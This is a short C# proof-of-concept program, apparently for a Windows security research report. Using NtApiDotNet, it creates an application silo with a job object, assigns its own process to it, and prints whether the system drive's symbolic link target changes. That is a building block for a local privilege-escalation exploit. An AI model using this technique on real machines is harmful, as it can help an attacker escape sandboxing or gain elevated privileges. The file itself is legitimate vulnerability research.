﻿using NtApiDotNet;
using System;
using System.IO;

namespace POC
{
    class Program
    {
        static string GetDriveSymlink()
        {
            string drive_letter = Path.GetPathRoot(Environment.SystemDirectory).TrimEnd('\\');
            using (var link = NtSymbolicLink.Open($@"\GLOBAL??\{drive_letter}"))
            {
                return link.Target;
            }
        }

        static void Main(string[] args)
        {
            try
            {
                Console.WriteLine("Before: {0}", GetDriveSymlink());
                using (var job = NtJob.Create())
                {
                    job.LimitFlags = JobObjectLimitFlags.Application;
                    job.CreateSilo();
                    job.AssignProcess(NtProcess.Current);
                }
                Console.WriteLine("After: {0}", GetDriveSymlink());
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
